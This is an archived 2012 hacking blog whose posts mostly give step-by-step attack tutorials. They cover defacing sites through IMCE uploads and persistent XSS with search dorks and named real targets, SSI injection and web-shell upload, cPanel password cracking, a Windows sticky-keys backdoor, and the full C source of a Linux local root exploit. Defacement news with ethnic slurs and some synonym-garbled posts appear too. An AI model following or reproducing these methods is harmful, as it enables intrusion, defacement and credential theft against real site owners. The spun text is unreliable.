HACKERS TIPS & TRICKS: June 2012

Saturday 30 June 2012

"IMCE" <= Remote File Upload Vulnerability

In this vulnerability a Remote Attack can upload his deface page or sometimes even a Shell on the vulnerable website.

Google Dork : inurl:"/imce?dir=" intitle:"File Browser"

Vulnerable URL : http://www.anywebsite.com/imce?dir=

Use both Bing search and Google Search to get more vulnerable website. Select any website from the search result, Like in my case I choose http://www.vride.com/imce?dir=db_backups

Click on "root" to change the current directory to root. Now look for the Upload option, In my case Upload option is present on the top left corner. Click on that. choose your deface Page and Click on Upload Button.

If the file has been uploaded successfully who will get the message that The File Has been uploaded.

Now under the File Name look for the file you uploaded. Like in my case I uploaded a fiile name test.htm <- When you will find your file double click on that to access it.

http://www.vride.com/imce?dir=db_backups

http://www.vride.com/sites/default/files/test.htm <- The File Which I Uploaded

[~]Dem0 :

http://www.arcireal.com/imce?dir=
http://www.la-gerbille.net/imce?dir=
http://ciam.inra.fr/biosp/imce?dir=

Thursday 28 June 2012

Web hosting Company Of Pakistan Hacked By ICA

WEB HOSTING COMPANY IN PAKISTAN HACKED BY TEAM ICA

CreativeON is a webhosting comapny in Pakistan, On June 28,2012 Its Website's support system was hacked by team ICA also know as INDISHELL and it is not patch up by the company till now.

URL HACKED- support.creativeon.com

MIRROR - ~~http://www.zone-h.com/mirror/id/17979512~~

How to Hack a Website with XSS Vulnerability

HACKING WEBSITE WITH PERSISTENT XSS

Today I had received tutorial on Hacking website with the persistent XSS by INDI-HEX. If you remembered this is the group who had hacked the pakistan search engine URDUMAZA yesterday by same XSS attack. Let's have a look to the tutorial submitted by INDI-HEX

Use Google/Bing Dorks for finding XSS vulnerability in the site.And If you are lucky then atleast one site you will get with Persistent XSS Vulnerability.

GOOGLE DORKS:-

inurl:".php?cmd="

inurl:".php?z="

inurl:".php?q="

inurl:".php?search="

inurl:".php?query="

inurl:".php?searchstring="

inurl:".php?keyword="

inurl:".php?file="

inurl:".php?years="

inurl:".php?txt="

inurl:".php?tag="

inurl:".php?max="

inurl:".php?from="

inurl:".php?author="

inurl:".php?pass="

inurl:".php?feedback="

inurl:".php?mail="

inurl:".php?cat="

inurl:".php?vote="

inurl:search.php?q=

inurl:com_feedpostold/feedpost.php?url=

inurl:scrapbook.php?id=

inurl:headersearch.php?sid=

inurl:/poll/default.asp?catid=

inurl:/search_results.php?search=

Let take an example take this site urdumaza.com.pk
Look for webpage which has XSS Vul.
eg:-

urdumaza.com.pk/urdu-poetry/search.php
You can see a Search box on Top left hand side i
nsert Your C0de there.
Like they have used <h1>hacked by Un_N0n Antil0g</h1> As shown in video
Insert the C0de in that search box , and press Submit.
A Webpage will appear , showing results. blah blah xD !! , ignore it.....
Then Goto Link --> http://www.urdumaza.com.pk/search
When Page appears , you can see The Code entered By you .
"As it is persistent XSS , Code will remain there forever.

VIDEO TUTORIAL

SUBMITED BY- Un_N0n Antil0g And C0de Hijacker-TEAM INDI-HEX

Wednesday 27 June 2012

Facebook rewarded $1000 To Young Boy For Finding Vulnerability In Facebook

Today we all know that web security is big problem as nothing is secured on net,Many big companies like Facebook,twitter,Microsoft And Adobe had also faced this problem so they started an bug bounty programs for finding bugs and vulnerability on there site.Same thing happen also with Facebook, many bugs are in Facebook and Facebook give bounty for finding bugs and reporting it to Facebook and even they add the name to white hat hacker list of Facebook.

Harsha Vardhan Boppana from Hyderabad,INDIA has awarded by $1000 for finding 2 Major Bugs in Facebook. First one is without knowing your old password you can change the password of your account and second one is the redirecting the Facebook main page to any other site, Bugs are now fixed by Facebook and $1000 will be soon rewarded to him via Paypal or issues a Black Card [Prepaid Debit Card ]. But now a days, they only issue Black Card.

As Harsh is my close friend so it was easy for me to take his interview (ABOUT HARSHA VARDHAN):-

Harsha is properly from Hyderabad,INDIA and studying B.TECH in Electronics from Vignan University

now you are thinking that he is in Electronics then how a Vulnerability researcher but the secret is that

in part time we together work on finding vulnerability and he is expert in that.

You can also contact Harsha Vardhan Boppana at harsha9502@gmail.com"

Now his name is added in the list of Official Facebook White Hat Hackers you can see here https://www.facebook.com/whitehat

He had send the technical report to facebook security with the Source of Vulnerable URL that i can't tell here although it had been fixed by facebook.Reason for that vulnerability is also reported by him.

And according to him it take weeks or months to get respond from facebook because they were fixing that bug then if your reported bug is true then in 2-3 months you will get your reward and your name will be added to the white hat hackers list. All think are done through e-mail.

COMMENT HERE FOR ANY QUERY

DNSCrypt - encrypts DNS traffic between your computer and OpenDNS

DNSCrypt, as its name suggests, encrypts DNS traffic between your computer and OpenDNS, in the same way SSL turns HTTP traffic into HTTPS encrypted traffic.

Initially, DNSCrypt was announced as being available for Mac only for now, but according to an OpenDNS article posted yesterday, the source code for DNSCrypt was published on GitHub when they've released the Mac preview and even though

Webhoneypot - Web Application Honeypot

DShield.org is offering this honeypot for users to capture automated web application exploits. It is a very simple "semi interactive" honeypot implemented in PHP.

Source: https://code.google.com/p/webhoneypot/

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

Hackers Target Pakistan Search Engine

HACKED BY Un_N0n AntiL0g & C0d3 Hij4ck3r

ALERT!!! Again Its a Pakistan high profiled site hacked by Un_N0n AntiL0g & C0d3 Hij4ck3r,this time Indian Hackers hit an search engine of Pakistan.

www.urdumaza.com

On June 27,2012 hacker Un_N0n AntiL0g & C0d3 Hij4ck3r the Member Of INDI-HEX find a vulnerable of Persistent XSS in a Pakistan Search Engine Site.There is no report that if the developer of site get this information or they had fixed this vulnerability.

COMING SOON:- HOW TO HACK SITE BY PERSISTENT XSS

TUTORIAL BY- Un_N0n AntiL0g

Karachi Stock Exchange Vulnerable To XSS

(XSS) IN KARACHI STOCK EXCHANGE WEBSITE

It's a shocking news that the Karachi Stock Exchange website had been hacked by method cross site scripting (XSS) by CODE HIJACKER. It's not so big problem no confidential data are leaked or anything on the site is not damage but the main page shown here is just XSS by the Code HIJACKER. But it is an issue that is this type of high profiled sites are secured or not

WEBSITE LINK- www.kse.com.pk

XSS(HACKED) LINK:-http://www.kse.com.pk/includes/mktActivities_indices.php?flashrandnum=%22%27%3Ch1%3E%3Ccenter%3E%3Cb%3EH4CK3D+BY+CODE+HIJACKER%3C%2Fh1%3E%3C%2Fcenter%3E%3C%2Fb%3E%3Ccenter%3E%3Cimage+src%3Dhttp%3A%2F%2Fi47.tinypic.com%2F346l2bm.jpg%3E%3C%2Fcenter%3E

Tuesday 26 June 2012

SSI (Server Side Include) Injection and shell uploading tutorial

Server Side Include is a web application exploit which give grant us access to upload files remotely to vuln. sites. File uploading is multi-extension exception is .php,you cannot execute your shell in .php form

First step is finding vulnerable site by GOOGLE/BING DORKS:-

inurl:bin/Cklb/
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=

If the Dorks doesn't work then find the sites manually by the following commands codes :-

Manual Injection:- Put the following codes in field of USERNAME & PASSWORD

IT WILL SHOW DATE
IT WILL SHOW RUNNING USER ON THE SERVER
<pre></pre></pre> IN LINUX ONLY
IT WILL SHOW DIRECTORY FILES
 WINDOWS ONLY, DISPLAY DIRECTORY FILES

After finding a vulnerable loop in site it's time to upload your deface page or shell.
First find a host provider where you can upload your deface like best one is pastehtml.com
Now enter the following code in USERNAME AND PASSWORD
Then by this code your deface will be be upload to view your deface page go to the http://website.com/deface.html

How to Upload shell in the site-

First Host your shell in .txt format on any site..
Then Enter the following code in login page
Check either your shell.txt is uploaded or not by this code
<pre></pre></pre>
In File Extension change your shell.txt to shell.php by the help of this command
Now you can access your shell by this link site.com/shell.php

COMMENT HERE ! FOR ANY DOUBT

AnDOSid the DOS tool for Android

AnDOSid-Android DOS tool

A new artefact appear by SCOTT HERBERT for Android adaptable phones,Its AnDOSid - the DOS apparatus for Android Phones. The acceleration of groups like Anonymous and LuzSec, as able-bodied as connected India / Pakistan cyberwar has aloft the affair of cyber-security high(er) in the minds of web owners.

Pentesting accoutrement abide to simulate such attacks and advice website aegis bodies avert adjoin them, about for the best allotment they currently alone abide for desktop computers. Adaptable phones have, over the aftermost few years, developed from simple accessories that accelerate and accept calls to adaptable accretion platforms which can be purchased for beneath than $100 a device.

AnDOSid fills that gap, acceptance aegis professionals to simulate a DOS advance (An http column flood advance to be exact) and of advance a dDOS on a web server, from adaptable phones. AnDOSid is actively actuality developed and I acceptable acknowledgment from the aegis association as to how you would like the appliance to evolve.

What's in this version:

Requires Internet access to send the http post data
Requires phone state to access the IMEI (one of the two identifiers sent with each post)

AnDOSid can be downloaded from the Android Market place and costs just £1 or Rs.74.58/-Only.

FBI Arrested Hacker Mr. Badoo

A anonymous hacker from Pakistan Cyber Space had been arrested by FBI on June 25,2012 in the case of hacking the PC of an event creator of drawing Prophet Muhammad's(SAW) named Andy.He found guilty in hacking Andy's PC and accounts and he deleted all that event from Facebook.

It has been about 2 Years from now. It all started with a maniac’s awful efforts of calumniating Islam back he, the name’s Andy, started a facebook accident of cartoon Prophet Muhammad’s(SAW) account with alone one ambition of calumniating the angel of Islam and affliction the millions of followers of Islam throughout the world. Though he and abounding of his supporters alarm this as an act of “freedom of speech”, they bootless to acumen as to why alone Prophet Muhammad’s(SAW) was considered.

Their aim is bright clear, they alone appetite to actualize altercation and acrimony amid 1.5 billion muslims beyond the globe, to antagonistic the angel of our admired Prophet Muhammad’s(SAW) image.

They about succeeded in their efforts but all thanks to muslims all over the world and distinctively Pakistan Government that they after an short delay, protested to this event. Pakistan government took a very sensitive step to ban all social networking site like Facebook,twitter,so.cl etc and YouTube are temporarily ban in Pakistan.

You can find more news about this on Google......

Monday 25 June 2012

WordPress Application Firewall. Protects against current and future attacks.

WordPress Application Firewall. Protects against current and future attacks. Email notification is disabled by default, notification can be activated and configured in Settings > WP WAF. Go to your WP WAF configuration page.

Source: https://wordpress.org/extend/plugins/wp-waf/

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

Hack Window 7 Logon Password without any sofware

If you are logged on any PC and want to change it password without any software and knowing the old password can you do it.. Ya Of course by this method you can change the password when you gain the access on PC.

First step is to set a backdoor in windows, backdoor simply means gaining access which can be also use in future So let start the real fun

Open The command prompt (run as administrator in win7&vista)

Now after it is open type the following given command

Syntax : net user account.name *

( specify the user account name like admin in place of account.name)

Then press enter and give any password for that account

Did you see friends your new password had been set and no old password was required to conform it

Just imagine that in anyway you got access to command without log on then you can change the password

Now Next Step is to press the shift key five times then you will get a dialog box called sticky key on your screen

By this sticky keys multiple keys can be press at a time,

this feature can be used at logon screen by pressing shift key five times.

Whenevr we start an application like paint or other, we were actually running mspaint.exe placed in the C:\windows\system32. or command prompt, we are running cmd.exe placed in system32 directory, similary

When shift key is press 5 times , system actually starts the executable file

sethc.exe placed in system32 directory. This means if we rename cmd.exe to sethc.exe and press shift 5 times, system would again start sethc.exe but instead of sticky keys the command prompt will be opened.

You can simply change it or renamed it see below for that:-

Go to C:\windows\system32

* Copy cmd.exe onto the desktop and rename to sethc.exe .*Now again copy that file and paste it to system32 directory.

@ Windows XP Users

Hopefully existing orignal sethc.exe must have been replaced and you had done. then press shift five times and you see command prompt on screen.You can access it at windows logon screen and change or clear the pass easily using "net user" command.

Note: You can also do these changes while using Guest Account. But when you will access command prompt , you can change or clear the password of administrator's account also . This is the fun hack by which we can hack into administrator's account by guest account.

@ Windows vista/7 Users

You had got a pop up box showing "Access Denied".

really we can not change system32 directory files until unless we don't have the permissions . You can not have the permissions until you do not have the ownership. So lets take ownership, change permissions, just follow the steps.

1. Right click on sethc.exe and run as administrator. Again right click on sethc.exe, open properties.
Click on Advanced tab , then on owner and click edit, change the owner from "trusted installer" to "administrator" and click apply.

2. Now click on 'Edit' in the security tab to edit the permissions. Click on 'Administrators' , give it full control
and apply changes.

Now it is done

Now try to replacing the orignal sethc.exe with our sethc.exe (that we got by renaming cmd.exe).
Press shift key five times and hopefully you would get command prompt on the screen instead of sticky keys.

Now Enjoy Command prompt at logon screen...

So if you get your friends laptop for a while then do not forget to set up a backdoor

finddomains - discovering domain names/web sites/virtual hosts

FindDomains is a multithreaded search engine discovery tool that will be very useful for penetration testers dealing with discovering domain names/web sites/virtual hosts which are located on too many IP addresses. Provides a console interface so you can easily integrate this tool to your pentest automation system.It retrieves domain names/web sites which are located on specified ip address/

BoNeSi - the DDoS Botnet Simulator

If you want to see demo video of this tool, please go to the Source.

BoNeSi, the DDoS Botnet Simulator is a Tool to simulate Botnet Traffic in a testbed environment on the wire. It is designed to study the effect of DDoS attacks.What traffic can be generated?BoNeSi generates ICMP, UDP and TCP (HTTP) flooding attacks from a defined botnet size (different IP addresses). BoNeSi is highly

Portsplit - Use multiple service in the same port.

Simple TCP port multiplexer (or "port splitter").

Just run "make" to compile. Binary will be in
"src" directory.

See example config file in examples directory.

Source: https://github.com/kheops2713/portsplit

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

Saturday 23 June 2012

14 Romanians arrested for hacking Lake Sheriff's Office website

Fourteen people have been arrested in a sweep across the eastern European country of Romania for hacking into and defacing the websites of 29 public institutions in their country and one here — the Lake County Sheriff's office.

Most of those arrested are young men, including the leader, 24-year-old Gabriel Baleasa from the city of Piatra Neamt. He went by a number of nicknames on the Internet, including "Lulzcart," "Anonsboat," "Anonsweb" and "Cartman."

The suspects are widely believed to be associated with a "hacktivist" group called Anonymous. Messages posted on the victim sites touted the group.

Cpanel Cracking Tutorial

Hi guys sorry for such a long Gap !, actually i was on a break so finally i'm back with fresh tutorials . Hope you all will enjoy it .

Things Required :-

Shelled site
Cpanel Password Cracker (shell)

Step By Step Tutorial :-

First open you shell & upload the cpanel password cracker shell . Download the Cpanel password cracker shell from Here .
Then go down & click on User .

Now after you have clicked on User, below you will get all the usernames of the Cpanel . So now move to next step, your next step will be to get a good Password list for a Dictionary attack . After getting it you have to copy the username & paste it in the username block (above) & paste the password list in the password block .Then finally click on start .

Tip: Password list should be short & effective .

After the cracking is finished, in the next page you will see the result .

After Getting the login info you can login by going -> www.site.com:2082 . Here you will get the cpanel login area .

Happy Cpanel Cracking Guys ! ;)
Doubts ? Comment !!

AT&T And Hostgator was hack.

<==============================>Target: ATT.comVulnerable Link: REDACTEDVuln. Type: Error-BasedVulnerable paramater: sb=DB: prod<==============================>Well; it just goes to show you, anything is vulnerable. You just have to know where to look. This DB has A LOT of information in it: names, addresses, mobile numbersect.. The information in this dump isn't even 1% of whats in here, I just

Friday 22 June 2012

How To Prevent From Malware Infection

Today Malware infection is common on internet which cause harm to PC so here are some points by which you can prevent your PC from Malicious Attacks and Infection

Anti-Virus should be up to date and from trusted company.
System and all software should also up to date
Avoid websites which are known to have malware in the past.
Always use the browser protection plugin,such as No-script, which effectively prevents most drive-by downloads
Do not use Vulnerable software always like SumatraPDF used always trusted one like Adobe Reader
Do not follow the links in emails,social media websites, without verifying the sender
Do not Download or execute programs from untrusted websites.
Always Aware Of Spams Site

How to Secure your Linux

Linux is a most secure operating system in comparison with the windows,and it also most stable OS in comparison of windows. More than 80% of All Web Servers on the Internet is operated by Linux
So how to secure your Linux let see in brief:-

There are Many Inbuilt processes to secure Linux Itself
To alter the parameters of Linux Kernel to make it more secure the following code is used /etc/sysctl.conf-sysctl.conf
Apply Following Configuration to secure your own Linux distribution

Net/ipv4/conf/all/rp_filter=1
Net/ipv4/conf/all/log_martians=1
Net/ipv4/conf/all/send_redirects=0
Net/ipv4/conf/all/accept_source_route=0
Net/ipv4/conf/all/accept_redirects=0
Net/ipv4/tcp_syncookies=1
Net/ipv4/icmp_echo_ignore_broadcast=1
Net/ipv4/ip_forward=1

Any Problem regarding this then comment plz

Ind-Hackers Target Umeed.tv

UMEED.TV HACKED BY TH3 D3STROY3R

A Pakistan .tv website named as umeed had been hacked by Indian Hackers group commonly known as T34M DESTROYER ARMY(Th3 D3stroy3r)

As from many days it had been noticed that there is like a Cold War between IND-PAK Black Hat hackers. Everyday more than 100 of sites of both countries are destroyed by hackers group.

It had been guess that the few important data had been destroyed from its database and had also try to harm the whole server, and the site had not been restored even now as whole things are destroyed so it will take time to maintain the site

Thursday 21 June 2012

Browsers Anti-XSS methods in ASP (classic) have been defeated!

If you want to see full article,please go to the Source.

Browsers Anti-XSS methods in ASP (classic) have been defeated!This time, I want to start with the summary section first to break the rules!SummaryThe intention of this paper is to prove the client-side XSS protection methods must have rules for different web application languages, otherwise they will be bypassed. This research is based on

Wednesday 20 June 2012

Download Local Root Exploit 2.6.18 2011

Local Roots Exploit are used to root on the Linux servers different version are comes's out according to updated Linux Servers. So here is the Local Root Exploit Of 2.6.18.2011 with 100% tested OK

LOcal Root Exploit 2.6.18 2011 by http://www.hackerscafe.in/
DOWNLOAD IT HERE

PASTEBIN LINK- http://pastebin.com/6eUFD2x0


/* 
 * 
 * 
 * 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                           
 * 0     _                   __           __       __                     1 
 * 1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
 * 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
 * 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
 * 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
 * 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
 * 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
 * 1                  \ \____/ >> Exploit database separated by exploit   0 
 * 0                   \/___/          type (local, remote, DoS, etc.)    1 
 * 1                                                                      0 
 * 0  By CrosS                                                            1 
 * 1                                                                      0  
 * 0  Linux 2011                                                          1 
 * 1                                                                      0 
 * -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 
 *  
 * Linux 2.6.18-128.el5 
 * Linux 2.6.9-89.EL 
 * Ubuntu 8.10 Linux 2.6.27 
 * 
 * For i386 & ppc compile with the command; 
 * gcc -w -o exploit exploit.c 
 * 
 * For x86_64 kernel and ppc64 Compile as; 
 * gcc -w -m64 -o exploit exploit.c 
 * 
 * Greetz: r0073r( 1337day.com ),r4dc0re,side^effects and all members of 1337day Team ) ..... & all members of r00tw0rm.com ( RW ) .. ) 
 * 
 * Submit Your Exploit at Submit@1337day.com | mr.inj3ct0r@gmail.com 
 * 
 * For Educational purpose Only)) 
 */ 

#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <sys/mman.h> 
#include <sys/sendfile.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <unistd.h> 
  
#if !defined(__always_inline) 
#define __always_inline inline __attribute__((always_inline)) 
#endif 
  
#if defined(__i386__) || defined(__x86_64__) 
#if defined(__LP64__) 
static __always_inline unsigned long 
current_stack_pointer(****) 
{ 
    unsigned long sp; 
  
    asm volatile ("movq %%rsp,%0; " : "=r" (sp)); 
  
    return sp; 
} 
  
#else 
static __always_inline unsigned long 
current_stack_pointer(****) 
{ 
    unsigned long sp; 
  
    asm volatile ("movl %%esp,%0" : "=r" (sp)); 
  
    return sp; 
} 
  
#endif 
  
#elif defined(__powerpc__) || defined(__powerpc64__) 
static __always_inline unsigned long 
current_stack_pointer(****) 
{ 
    unsigned long sp; 
  
    asm volatile ("mr %0,%%r1; " : "=r" (sp)); 
  
    return sp; 
} 
  
#endif 
  
#if defined(__i386__) || defined(__x86_64__) 
#if defined(__LP64__) 
static __always_inline unsigned long 
current_task_struct(****) 
{ 
    unsigned long task_struct; 
  
    asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct)); 
  
    return task_struct; 
} 
  
#else 
#define TASK_RUNNING 0 
  
static __always_inline unsigned long 
current_task_struct(****) 
{ 
    unsigned long task_struct, thread_info; 
  
    thread_info = current_stack_pointer() & ~(4096 - 1); 
  
    if (*(unsigned long *)thread_info >= 0xc0000000) { 
        task_struct = *(unsigned long *)thread_info; 
  
        /* 
         * The TASK_RUNNING is the Only poss1ble sta7e for a proCes5 exEcut1ng 
         * in us3r-spaCe. 
         */ 
        if (*(unsigned long *)task_struct == TASK_RUNNING) 
            return task_struct; 
    } 
  
    /* 
     * Prior to the 2.6 kernel series, the task_struct was stored at the end 
     * of the kernel stack. 
     */ 
    task_struct = current_stack_pointer() & ~(8192 - 1); 
  
    if (*(unsigned long *)task_struct == TASK_RUNNING) 
        return task_struct; 
  
    thread_info = task_struct; 
  
    task_struct = *(unsigned long *)thread_info; 
  
    if (*(unsigned long *)task_struct == TASK_RUNNING) 
        return task_struct; 
  
    return -1; 
} 
  
#endif 
  
#elif defined(__powerpc__) || defined(__powerpc64__) 
#define TASK_RUNNING 0 
  
static __always_inline unsigned long 
current_task_struct(****) 
{ 
    unsigned long task_struct, thread_info; 
  
#if defined(__LP64__) 
    task_struct = current_stack_pointer() & ~(16384 - 1); 
  
#else 
    task_struct = current_stack_pointer() & ~(8192 - 1); 
  
#endif 
  
    if (*(unsigned long *)task_struct == TASK_RUNNING) 
        return task_struct; 
  
    thread_info = task_struct; 
  
    task_struct = *(unsigned long *)thread_info; 
  
    if (*(unsigned long *)task_struct == TASK_RUNNING) 
        return task_struct; 
  
    return -1; 
} 
  
#endif 
  
#if defined(__i386__) || defined(__x86_64__) 
static unsigned long uid, gid; 
  
static int 
change_cred(****) 
{ 
    unsigned int *task_struct; 
  
    task_struct = (unsigned int *)current_task_struct(); 
  
    while (task_struct) { 
        if (task_struct[0] == uid && task_struct[1] == uid && 
                task_struct[2] == uid && task_struct[3] == uid && 
                task_struct[4] == gid && task_struct[5] == gid && 
                task_struct[6] == gid && task_struct[7] == gid) { 
            task_struct[0] = task_struct[1] = 
            task_struct[2] = task_struct[3] = 
            task_struct[4] = task_struct[5] = 
            task_struct[6] = task_struct[7] = 0; 
            break; 
        } 
  
        task_struct++; 
    } 
  
    return -1; 
} 
  
#elif defined(__powerpc__) || defined(__powerpc64__) 
static int 
change_cred(****) 
{ 
    unsigned int *task_struct; 
  
    task_struct = (unsigned int *)current_task_struct(); 
  
    while (task_struct) { 
        if (!task_struct[0]) { 
            task_struct++; 
            continue; 
        } 
  
        if (task_struct[0] == task_struct[1] && 
                task_struct[0] == task_struct[2] && 
                task_struct[0] == task_struct[3] && 
                task_struct[4] == task_struct[5] && 
                task_struct[4] == task_struct[6] && 
                task_struct[4] == task_struct[7]) { 
            task_struct[0] = task_struct[1] = 
            task_struct[2] = task_struct[3] = 
            task_struct[4] = task_struct[5] = 
            task_struct[6] = task_struct[7] = 0; 
            break; 
        } 
  
        task_struct++; 
    } 
  
    return -1; 
} 
  
#endif 
  
#define PAGE_SIZE getpagesize() 
  
int 
main(****) 
{ 
    char *addr; 
    int out_fd, in_fd; 
    char template[] = "/tmp/tmp.XXXXXX"; 
  
#if defined(__i386__) || defined(__x86_64__) 
    uid = getuid(), gid = getgid(); 
  
#endif 
  
    if ((addr = mmap(NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED| 
            MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) { 
        perror("mmap"); 
        exit(EXIT_FAILURE); 
    } 
  
#if defined(__i386__) || defined(__x86_64__) 
#if defined(__LP64__) 
    addr[0] = '\xff'; 
    addr[1] = '\x24'; 
    addr[2] = '\x25'; 
    *(unsigned long *)&addr[3] = 8; 
    *(unsigned long *)&addr[8] = (unsigned long)change_cred; 
  
#else 
    addr[0] = '\xff'; 
    addr[1] = '\x25'; 
    *(unsigned long *)&addr[2] = 8; 
    *(unsigned long *)&addr[8] = (unsigned long)change_cred; 
  
#endif 
  
#elif defined(__powerpc__) || defined(__powerpc64__) 
#if defined(__LP64__) 
    /* 
     * The use of function descriptors by the Power 64-bit ELF ABI requires 
     * the use of a fake function descriptor.:P 
     */ 
    *(unsigned long *)&addr[0] = *(unsigned long *)change_cred; 
  
#else 
    addr[0] = '\x3f'; 
    addr[1] = '\xe0'; 
    *(unsigned short *)&addr[2] = (unsigned short)change_cred>>16; 
    addr[4] = '\x63'; 
    addr[5] = '\xff'; 
    *(unsigned short *)&addr[6] = (unsigned short)change_cred; 
    addr[8] = '\x7f'; 
    addr[9] = '\xe9'; 
    addr[10] = '\x03'; 
    addr[11] = '\xa6'; 
    addr[12] = '\x4e'; 
    addr[13] = '\x80'; 
    addr[14] = '\x04'; 
    addr[15] = '\x20'; 
  
#endif 
  
#endif 
  
    if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) { 
        perror("socket"); 
        exit(EXIT_FAILURE); 
    } 
  
    if ((in_fd = mkstemp(template)) == -1) { 
        perror("mkstemp"); 
        exit(EXIT_FAILURE); 
    } 
  
    if(unlink(template) == -1) { 
        perror("unlink"); 
        exit(EXIT_FAILURE); 
    } 
  
    if (ftruncate(in_fd, PAGE_SIZE) == -1) { 
        perror("ftruncate"); 
        exit(EXIT_FAILURE); 
    } 
  
    sendfile(out_fd, in_fd, NULL, PAGE_SIZE); 
  
    execl("/bin/sh", "sh", "-i", NULL); 
  
    exit(EXIT_SUCCESS); 
}

Pakistan Web server Hacked By Silent Hacker

HACKED BY INDISHELL

Last Tuesday bring a bad news to Pakistan Cyber Space as Indian Hacker's group named as INDISHELL had attacked the web server of Pakistan which had some educational and tech website of .pk

Silent Hacker from INDISHELL who had attacked the web server had posted some messages for Pakistan

The main reason behind this is that the Pakistan Hackers are destroying the Cyber Space of India.

MESSAGE FROM INDISHELL:-

Message to Porkies Lamers Just Back Off from Indian Cyber Space
We have seen many kids like You Just defacing D grade sites Bunch of noobs
What u think! You are only one here In this cyber space :P
This is just the beginning we will destroy your cyber space Which is already destroyed
And Special FucK Goes to Lamers of Pakistan Cyber Pigs ( PCP )..... and Mahesh Haxor aka Chutiya Lamer and Abdul Basit ( Shell Beggar )
We ar3 :- Ash3ll , Decod3r , Atul , Cyb3r.Pr3dat0r Godzilla , Code Breaker , X Parameter , Inrf Ninja , SileNt Hax0R , Manish , Dark Wolf , Neo ..
Greetz to :- Yash Bhaiya , Jaguar Hacker Nyro Hacker , Web Ruler , Xtremee KillarLoveTheRisk India , Hacker_m329 , DarkSpirit Negative

As this attack had create a tension between the IND-PAK Cyber Space and also can lead to Cyber war

Below is the list of hacked site some of them are restore but you can see them in mirrors

MIRRORS:-

http://zone-hack.com/mirror/id/63006

http://zone-hack.com/mirror/id/63007

http://zone-hack.com/mirror/id/63008

http://zone-hack.com/mirror/id/63009
...
...
...
...
http://zone-hack.com/mirror/id/63091
http://zone-hack.com/mirror/id/63092
http://zone-hack.com/mirror/id/63093
http://zone-hack.com/mirror/id/63094